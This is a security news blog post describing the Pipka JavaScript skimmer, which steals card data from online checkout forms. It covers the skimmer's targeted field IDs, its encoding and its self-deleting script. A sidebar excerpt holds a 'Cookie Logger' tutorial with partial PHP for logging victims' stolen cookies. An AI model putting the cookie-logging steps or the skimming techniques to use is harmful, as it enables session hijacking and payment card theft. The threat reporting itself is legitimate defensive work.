Skip to main content

Pipka – New JavaScript Skimmer that Attacks eCommerce Website to Steal Payment Card Details

By
Pipka

A new JavaScript skimmer dubbed Pipka attacks eCommerce websites to steal the payment data entered into online payment forms of the websites. It extracts details such as payment account number, expiration date, CVV, and cardholder name and address, from the checkout pages.
The Pipka found to be installed on more than sixteen eCommerce websites, the attack campaign detected by Visa Payment Fraud Disruption’s (PFD) eCommerce Threat Disruption (eTD) program.

Pipka Play Around Stealthy

The use of web skimmers emerges as a turnkey business for cybercriminals and they continue to target online stores to exfiltrate users’ payment card details.
Pipka has a special ability when compared to other online skimmers, it is capable of removing itself from the HTML codes of the compromised website once it completes the execution.
This new interesting feature gives pipka an ability to play around stealthy and it marks a significant development in JavaScript skimming.
Threat actors behind pipka inject the skimmer script directly into the targeted eCommerce website, once executed it harvests data from the forms entered. The harvested data is base64 encoded and encrypted using ROT13 cipher.
Before sending the data to the attacker server, it checks for the uniqueness of the data string to avoid duplicate data. The following are the targeted payment account number fields.
  • authorizenet_cc_number
  • ctl00_PageContent_tbCardNumber
  • input-cc-number
  • cc_number
  • paypal_direct_cc_number
  • ECommerce_DF_paymentMethod_number
  • input[id$=\x27_CardNumber\x27]
PFD found Pipka on the North American merchant website that was previously infected by Inter, another JavaScript skimmer.
Pipka
Pipka Sample Script
Pipka lets attackers customize for specific form fields to skim data. One Sample observed by PFD “target two-step checkout pages that collect billing data on one page and payment account data on another.”
Another notable feature is anti-forensics ability, whenever the skimmer executes it calls for a start process function, which all calls for a clear function ability. The clear function locates for the skimmer script tag and removes it immediately.This function makes analysis so difficult as the script gets removed immediately and it is the first time self-cleaning feature available with JavaScript skimmers.
Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary...
Post a Comment
Read more

iOS/macOS Webcam Can be Hacked With A Single Click On Malformed Link – Hacker Rewarded $75,000

By
By just making the users visiting a link, an attacker can hack the users’ iOS/macOS Camera using zero-day bugs in Safari. With iOS and macOS camera security model every app needs to assigned permission manually but Apple’s own app such as  Safari  gets access by default. Security researcher Ryan Pickren  discovered  seven new vulnerabilities with Safari browser that allows attackers to access your device’s camera, microphone, or location, and in some cases, saved passwords as well. Pickren said that Safari not using the method of the origin to keep track of the open website, “I deduced that Safari was likely running a Generic URI Syntax parser against all open windows to get the URIs’ hostnames, then doing some extra parsing on those.” Exploiting Bugs to Access Camera He started exploiting using javascript: data: and about, but that fails, but while parsing file: which specified for remote or FTP purpose( file://host.example.com/Share/path/to/file.txt ...
Post a Comment
Read more